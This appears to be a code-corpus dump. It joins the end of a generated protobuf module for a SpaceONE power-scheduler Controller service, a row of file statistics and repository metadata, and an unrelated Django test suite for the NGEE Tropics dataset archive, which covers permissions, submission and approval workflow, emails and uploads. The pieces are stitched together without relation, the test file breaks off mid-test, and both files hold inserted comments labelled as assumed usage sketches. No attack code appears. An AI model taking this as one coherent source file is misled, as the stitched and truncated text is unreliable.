'DESCRIPTOR' : _CONTROLLERSTATQUERY,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerStatQuery)
})
_sym_db.RegisterMessage(ControllerStatQuery)
ControlRequest = _reflection.GeneratedProtocolMessageType('ControlRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTROLREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControlRequest)
})
_sym_db.RegisterMessage(ControlRequest)
UpdatePluginRequest = _reflection.GeneratedProtocolMessageType('UpdatePluginRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATEPLUGINREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.UpdatePluginRequest)
})
_sym_db.RegisterMessage(UpdatePluginRequest)
VerifyPluginRequest = _reflection.GeneratedProtocolMessageType('VerifyPluginRequest', (_message.Message,), {
'DESCRIPTOR' : _VERIFYPLUGINREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.VerifyPluginRequest)
})
_sym_db.RegisterMessage(VerifyPluginRequest)
_CONTROLLER = _descriptor.ServiceDescriptor(
name='Controller',
full_name='spaceone.api.power_scheduler.v1.Controller',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1793,
serialized_end=3274,
methods=[
_descriptor.MethodDescriptor(
name='create',
full_name='spaceone.api.power_scheduler.v1.Controller.create',
index=0,
containing_service=None,
input_type=_CREATECONTROLLERREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\002!\"\037/power-scheduler/v1/controllers',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='update',
full_name='spaceone.api.power_scheduler.v1.Controller.update',
index=1,
containing_service=None,
input_type=_UPDATECONTROLLERREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\0020\032./power-scheduler/v1/controller/{controller_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='delete',
full_name='spaceone.api.power_scheduler.v1.Controller.delete',
index=2,
containing_service=None,
input_type=_CONTROLLERREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\0020*./power-scheduler/v1/controller/{controller_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='get',
full_name='spaceone.api.power_scheduler.v1.Controller.get',
index=3,
containing_service=None,
input_type=_GETCONTROLLERREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\0020\022./power-scheduler/v1/controller/{controller_id}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='list',
full_name='spaceone.api.power_scheduler.v1.Controller.list',
index=4,
containing_service=None,
input_type=_CONTROLLERQUERY,
output_type=_CONTROLLERSINFO,
serialized_options=b'\202\323\344\223\002K\022\037/power-scheduler/v1/controllersZ(\"&/power-scheduler/v1/controllers/search',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='stat',
full_name='spaceone.api.power_scheduler.v1.Controller.stat',
index=5,
containing_service=None,
input_type=_CONTROLLERSTATQUERY,
output_type=google_dot_protobuf_dot_struct__pb2._STRUCT,
serialized_options=b'\202\323\344\223\002&\"$/power-scheduler/v1/controllers/stat',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='control',
full_name='spaceone.api.power_scheduler.v1.Controller.control',
index=6,
containing_service=None,
input_type=_CONTROLREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\0028\"6/power-scheduler/v1/controller/{controller_id}/control',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='update_plugin',
full_name='spaceone.api.power_scheduler.v1.Controller.update_plugin',
index=7,
containing_service=None,
input_type=_UPDATEPLUGINREQUEST,
output_type=_CONTROLLERINFO,
serialized_options=b'\202\323\344\223\0027\0325/power-scheduler/v1/controller/{controller_id}/plugin',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='verify_plugin',
full_name='spaceone.api.power_scheduler.v1.Controller.verify_plugin',
index=8,
containing_service=None,
input_type=_VERIFYPLUGINREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=b'\202\323\344\223\002>\"</power-scheduler/v1/controller/{controller_id}/plugin/verify',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CONTROLLER)
DESCRIPTOR.services_by_name['Controller'] = _CONTROLLER
# @@protoc_insertion_point(module_scope)
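# A minimal usage sketch (an assumption, not part of the generated module):
# once this _pb2 module is importable, the registered classes behave like any
# other protobuf messages. Module and class names come from this file; the
# surrounding script is hypothetical.
# from spaceone.api.power_scheduler.v1 import controller_pb2
# req = controller_pb2.ControllerRequest()          # empty message instance
# payload = req.SerializeToString()                 # wire-format bytes
# round_tripped = controller_pb2.ControllerRequest.FromString(payload)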
| 49.440409 | 4,807 | 0.771862 | 5,577 | 43,557 | 5.706652 | 0.053254 | 0.038459 | 0.068372 | 0.069252 | 0.808804 | 0.77776 | 0.750833 | 0.729969 | 0.65569 | 0.625369 | 0 | 0.040463 | 0.105218 | 43,557 | 880 | 4,808 | 49.496591 | 0.776133 | 0.029869 | 0 | 0.675277 | 1 | 0.01353 | 0.244353 | 0.206516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00984 | 0 | 0.00984 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| 0cd8a733f49a217cb81062ae5fe269d19890f3a1 | 65,641 | py | Python | archive_api/tests/test_api.py | NGEET/ngt-archive | 978b26b7617b5c465046121838c000c4c46022f4 | ["BSD-3-Clause-LBNL"] | 10 | 2017-04-15T14:43:22.000Z | 2021-05-06T21:56:42.000Z | archive_api/tests/test_api.py | NGEET/ngt-archive | 978b26b7617b5c465046121838c000c4c46022f4 | ["BSD-3-Clause-LBNL"] | 53 | 2017-06-13T20:45:26.000Z | 2022-03-24T17:39:19.000Z | archive_api/tests/test_api.py | NGEET/ngt-archive | 978b26b7617b5c465046121838c000c4c46022f4 | ["BSD-3-Clause-LBNL"] | 3 | 2017-06-16T17:34:15.000Z | 2021-03-30T17:35:10.000Z |
from __future__ import print_function, unicode_literals
import json
from unittest import mock
from unittest.mock import PropertyMock
import os
import shutil
from django.contrib.auth.models import User
from django.core import mail
from django.test import Client
from django.test import override_settings
from os.path import dirname
from rest_framework import status
from rest_framework.test import APITestCase
from archive_api.models import DataSetDownloadLog, DataSet
from ngt_archive import settings
# Mock methods
def get_max_size(size):
""" Return a get_size method for the size given"""
def get_size():
return size
return get_size
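# Hypothetical usage sketch (an assumption, not taken from the original tests):
# the factory pairs naturally with a PropertyMock, which invokes its
# side_effect with no arguments every time the patched property is read.
# with mock.patch('django.core.files.uploadedfile.InMemoryUploadedFile.size',
#                 new_callable=PropertyMock) as mock_size:
#     mock_size.side_effect = get_max_size(2147483648)  # property reports 2 GiB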
class ApiRootClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def setUp(self):
self.client = Client()
user = User.objects.get(username="auser")
self.client.force_login(user)
def test_client_get_root(self):
response = self.client.get('/api/v1/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"datasets": "http://testserver/api/v1/datasets/",
"sites": "http://testserver/api/v1/sites/",
"variables": "http://testserver/api/v1/variables/",
"people": "http://testserver/api/v1/people/",
"plots": "http://testserver/api/v1/plots/"})
@override_settings(EMAIL_NGEET_TEAM='ngeet-team@testserver',
EMAIL_SUBJECT_PREFIX='[ngt-archive-test]')
class DataSetClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
def test_set_publication_date_denied(self):
self.login_user("vibe")
#########################################################################
# User may NOT set the publication date
response = self.client.get("/api/v1/datasets/2/publication_date/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'detail': 'Not found.'}, value)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
3)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.login_user("lukecage")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
1)
self.login_user("arrow")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
1)
self.login_user("admin")
response = self.client.get('/api/v1/datasets/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(len(json.loads(response.content.decode('utf-8'))),
4)
def test_options(self):
self.login_user("auser")
response = self.client.options('/api/v1/datasets/')
self.assertContains(response, "actions")
self.assertContains(response, "upload")
self.assertContains(response, "submit")
self.assertContains(response, "approve")
self.assertContains(response, "unapprove")
self.assertContains(response, "unsubmit")
def test_client_unnamed(self):
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
dataset_url = json.loads(response.content.decode('utf-8'))["url"]
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post("{}upload/".format(dataset_url), {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
response = self.client.get(dataset_url)
self.assertContains(response, '{}archive/'.format(dataset_url),
status_code=status.HTTP_200_OK)
response = self.client.get('{}archive/'.format(dataset_url))
self.assertContains(response, ''.encode('utf-8'))
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '7686')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=Archive_" in response['Content-Disposition'])
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/datasets/2/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/datasets/2/')
value = json.loads(response.content.decode('utf-8'))
self.maxDiff=None
self.assertEqual(value,
{'modified_date': '2016-10-28T23:01:20.066913Z', 'doi': '', 'start_date': '2016-10-28',
'status_comment': '', 'plots': ['http://testserver/api/v1/plots/1/'],
'created_date': '2016-10-28T19:15:35.013361Z',
'funding_organizations': 'A few funding organizations',
'authors': ['http://testserver/api/v1/people/2/'], 'cdiac_import': False,
'doe_funding_contract_numbers': '',
'description': 'Qui illud verear persequeris te. Vis probo nihil verear an, zril tamquam philosophia eos te, quo ne fugit movet contentiones. Quas mucius detraxit vis an, vero omnesque petentium sit ea. Id ius inimicus comprehensam.',
'submission_date': '2016-10-28', 'qaqc_method_description': '',
'variables': ['http://testserver/api/v1/variables/2/',
'http://testserver/api/v1/variables/3/',
'http://testserver/api/v1/variables/1/'], 'archive': None,
'cdiac_submission_contact': None, 'reference': '', 'additional_access_information': '',
'contact': 'http://testserver/api/v1/people/2/', 'acknowledgement': '',
'data_set_id': 'NGT0001', 'archive_filename': None,
'modified_by': 'auser', 'status': '1', 'ngee_tropics_resources': True, 'qaqc_status': None,
'end_date': None, 'additional_reference_information': '', 'name': 'Data Set 2',
'managed_by': 'auser', 'sites': ['http://testserver/api/v1/sites/1/'],
'originating_institution': "LBNL", 'version': '0.0',
'url': 'http://testserver/api/v1/datasets/2/', 'access_level': '0',
'publication_date': None,
}
)
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"name":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
# Was the notification email sent?
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject,"[ngt-archive-test] Dataset Draft (NGT0004)")
self.assertTrue(email.body.find("""The dataset NGT0004:FooBarBaz has been saved as a draft in the NGEE Tropics Archive.
The dataset can be viewed at http://testserver. Login with your account credentials,
select "Edit Drafts" and then click the "Edit" button for NGT0004:FooBarBaz.
""") > 0)
self.assertEqual(email.to,['myuser@foo.bar'])
self.assertEqual(email.reply_to, settings.ARCHIVE_API['EMAIL_NGEET_TEAM'])
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['access_level'], '0')
self.assertEqual(value['sites'], [])
self.assertEqual(value['managed_by'], 'auser')
self.assertEqual(value['end_date'], None)
self.assertEqual(value['doe_funding_contract_numbers'], None)
self.assertEqual(value['funding_organizations'], None)
self.assertEqual(value['description'], 'A FooBarBaz DataSet')
self.assertEqual(value['additional_access_information'], None)
self.assertEqual(value['name'], 'FooBarBaz')
self.assertEqual(value['modified_by'], 'auser')
self.assertEqual(value['ngee_tropics_resources'], None)
self.assertEqual(value['status'], str(DataSet.STATUS_DRAFT))
self.assertEqual(value['doi'], None)
self.assertEqual(value['plots'], [])
self.assertEqual(value['contact'], None)
self.assertEqual(value['reference'], None)
self.assertEqual(value['variables'], [])
self.assertEqual(value['additional_reference_information'], None)
self.assertEqual(value['start_date'], None)
self.assertEqual(value['acknowledgement'], None)
self.assertEqual(value['status_comment'], None)
self.assertEqual(value['submission_date'], None)
self.assertEqual(value['qaqc_status'], None)
self.assertEqual(value['authors'], ["http://testserver/api/v1/people/2/"])
self.assertEqual(value['url'], 'http://testserver/api/v1/datasets/5/')
self.assertEqual(value['qaqc_method_description'], None)
#########################################################################
# User may NOT set the publication date on a DRAFT dataset
response = self.client.get("/api/v1/datasets/5/publication_date/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'detail': 'Only a dataset in SUBMITTED or APPROVED status may have a publication date set.'}, value)
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
# The submit action should fail
response = self.client.post('/api/v1/datasets/5/submit/')
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'missingRequiredFields': ['archive',
'sites',
'contact',
'variables',
'ngee_tropics_resources',
'funding_organizations',
'originating_institution']}, value)
def test_client_put(self):
self.login_user("auser")
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
response = self.client.get('/api/v1/datasets/1/')
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['description'], "A FooBarBaz DataSet")
def test_user_workflow(self):
"""
Test dataset workflow for an NGT User
:return:
"""
self.login_user("auser")
#########################################################################
# A dataset in submitted mode may not be submitted
response = self.client.get("/api/v1/datasets/2/submit/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in DRAFT status may be submitted'}, value)
#########################################################################
# NGT User may not APPROVE a dataset
response = self.client.get("/api/v1/datasets/1/approve/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'You do not have permission to perform this action.'}, value)
#########################################################################
# NGT User may not APPROVE a dataset
response = self.client.get("/api/v1/datasets/2/approve/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'You do not have permission to perform this action.'}, value)
#########################################################################
# NGT User may edit a dataset in DRAFT mode if they own it
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
self.assertEqual({'missingRequiredFields': ['archive','authors', 'funding_organizations', 'originating_institution']},
value)
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT User may SUBMIT a dataset in DRAFT mode if they own it
# Make sure the file is uploaded first
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
#########################################################################
# NGT User may not unsubmit a dataset
response = self.client.get("/api/v1/datasets/1/unsubmit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'You do not have permission to perform this action.'}, value)
def test_admin_approve_workflow(self):
"""
Test Admin dataset workflow
:return:
"""
self.login_user("admin")
#########################################################################
# NGT Administrator may edit any DRAFT status (this will fail due to missing fields)
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual({'missingRequiredFields': ['archive','authors', 'funding_organizations', 'originating_institution']},
value)
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
self.assertEqual(0, len(mail.outbox)) # no notification emails sent
#########################################################################
# Cannot submit a dataset that is already in SUBMITTED status
response = self.client.get("/api/v1/datasets/2/submit/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in DRAFT status may be submitted'}, value)
self.assertEqual(0, len(mail.outbox)) # no notification emails sent
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/2/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
#########################################################################
# NGT Administrator may edit a dataset in SUBMITTED status
response = self.client.put('/api/v1/datasets/2/',
data='{"description":"A FooBarBaz DataSet",'
'"name": "Data Set 2", '
'"status_comment": "",'
'"doi": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"access_level": "0",'
'"additional_reference_information": "",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/4/","http://testserver/api/v1/people/3/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
response = self.client.get("/api/v1/datasets/2/") # check authors
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(value["description"], "A FooBarBaz DataSet")
self.assertEqual(value["name"], "Data Set 2")
self.assertEqual(value["status_comment"], "")
self.assertEqual(value["doi"], "")
self.assertEqual(value["originating_institution"], "Lawrence Berkeley National Lab")
self.assertEqual(value["start_date"], "2016-10-28")
self.assertEqual(value["end_date"], None)
self.assertEqual(value["qaqc_status"], None)
self.assertEqual(value["qaqc_method_description"], "")
self.assertEqual(value["ngee_tropics_resources"], True)
self.assertEqual(value["funding_organizations"], "The funding organizations for my dataset")
self.assertEqual(value["doe_funding_contract_numbers"], "")
self.assertEqual(value["acknowledgement"], "")
self.assertEqual(value["reference"], "")
self.assertEqual(value["access_level"], "0")
self.assertEqual(value["additional_reference_information"], "")
self.assertEqual(value["additional_access_information"], "")
self.assertEqual(value["contact"], "http://testserver/api/v1/people/4/")
self.assertEqual(value["authors"], ["http://testserver/api/v1/people/4/", "http://testserver/api/v1/people/3/"])
self.assertEqual(value["sites"], ["http://testserver/api/v1/sites/1/"])
self.assertEqual(value["plots"], ["http://testserver/api/v1/plots/1/"])
self.assertEqual(value["variables"],
["http://testserver/api/v1/variables/2/","http://testserver/api/v1/variables/1/"])
#########################################################################
# A dataset that is not in SUBMITTED status may not be approved
response = self.client.get("/api/v1/datasets/1/approve/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in SUBMITTED status may be approved'}, value)
self.assertEqual(0, len(mail.outbox)) # no notification emails sent
#########################################################################
# NGT Administrator may APPROVE a SUBMITTED dataset
response = self.client.get("/api/v1/datasets/2/approve/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been approved.', 'success': True}, value)
# Was the notification email sent?
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject, "[ngt-archive-test] Dataset Approved (NGT0001)")
self.assertTrue(email.body.find("""The dataset NGT0001:Data Set 2 created on 10/28/2016 has been approved for release.
The dataset can be viewed at http://testserver. Login with your account credentials,
select "View Approved Datasets" and then click the "Approve" button for NGT0001:Data Set 2.
""") > 0)
self.assertEqual(email.to, ['myuser@foo.bar'])
self.assertEqual(email.reply_to, settings.ARCHIVE_API['EMAIL_NGEET_TEAM'])
#########################################################################
# NGT Administrator may set publication date to now
response = self.client.get("/api/v1/datasets/2/publication_date/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'Publication date has been set.', 'success': True}, value)
# Validate that a publication date was set
response = self.client.get("/api/v1/datasets/2/")
assert response.json()["publication_date"] is not None
#########################################################################
# NGT Administrator may set publication date to a specific date
response = self.client.get("/api/v1/datasets/2/publication_date/?date=1/2/2018")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'Publication date has been set.', 'success': True}, value)
# Validate that a publication date was set
response = self.client.get("/api/v1/datasets/2/")
pub_date = response.json()["publication_date"]
assert pub_date is not None
assert pub_date == "2018-01-02"
#########################################################################
# APPROVED status: Cannot be deleted by anyone
response = self.client.delete("/api/v1/datasets/2/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/2/") # should be deleted
self.assertEqual(status.HTTP_200_OK, response.status_code)
response = self.client.get("/api/v1/datasets/2/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['status'], str(DataSet.STATUS_APPROVED))
#########################################################################
# An APPROVED dataset may not be unsubmitted directly; the NGT Administrator must unapprove it first
response = self.client.get("/api/v1/datasets/2/unsubmit/") # In approved mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in SUBMITTED status may be un-submitted'}, value)
# Make sure no additional notification was sent
self.assertEqual(len(mail.outbox), 1)
response = self.client.get("/api/v1/datasets/2/unapprove/") # In approved mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been unapproved.', 'success': True}, value)
self.assertEqual(1, len(mail.outbox)) # no additional notification emails sent
#########################################################################
# A dataset that is not in APPROVED status may not be unapproved
response = self.client.get("/api/v1/datasets/1/unapprove/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.assertEqual({'detail': 'Only a data set in APPROVED status may be unapproved'}, value)
response = self.client.get("/api/v1/datasets/2/") # Check the status
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['status'], str(DataSet.STATUS_SUBMITTED))
self.assertEqual(1, len(mail.outbox)) # no additional notification emails sent
def test_admin_unsubmit(self):
"""
Test Admin unsubmit
:return:
"""
self.login_user("admin")
#########################################################################
# An admin may unsubmit a dataset in SUBMITTED mode
response = self.client.get("/api/v1/datasets/2/unsubmit/") # In submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been unsubmitted.', 'success': True}, value)
response = self.client.get("/api/v1/datasets/2/")
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(value['status'], str(DataSet.STATUS_DRAFT)) # check that the status is in DRAFT
def test_user_delete_not_allowed(self):
"""
Test that an NGT user may not delete datasets
:return:
"""
self.login_user("auser")
#########################################################################
# NGT User may not delete a SUBMITTED dataset
response = self.client.delete("/api/v1/datasets/2/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
# Confirm that it wasn't deleted
response = self.client.get("/api/v1/datasets/2/") # should still exist
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT user may not delete a DRAFT dataset either
response = self.client.delete("/api/v1/datasets/1/") # In draft mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/1/") # should still exist
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_admin_delete_not_allowed(self):
"""
Test that an admin may not delete datasets
:return:
"""
self.login_user("admin")
#########################################################################
# Admin may not delete a SUBMITTED dataset
response = self.client.delete("/api/v1/datasets/2/") # In submitted mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/2/") # should still exist
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# Admin may not delete a DRAFT dataset either
response = self.client.delete("/api/v1/datasets/1/") # In draft mode, owned by auser
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
response = self.client.get("/api/v1/datasets/1/") # should still exist
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_upload(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("admin")
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
response = self.client.get('/api/v1/datasets/1/')
self.assertContains(response, 'http://testserver/api/v1/datasets/1/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('/api/v1/datasets/1/archive/')
self.assertContains(response, ''.encode('utf-8'))
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length" ], '7686')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=Archive_" in response['Content-Disposition'])
downloadlog = DataSetDownloadLog.objects.all()
self.assertEqual(len(downloadlog),1)
# Now try to upload a text file (no restriction on file type)
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
self.assertContains(response, 'File uploaded',
status_code=status.HTTP_201_CREATED)
response = self.client.get('/api/v1/datasets/1/')
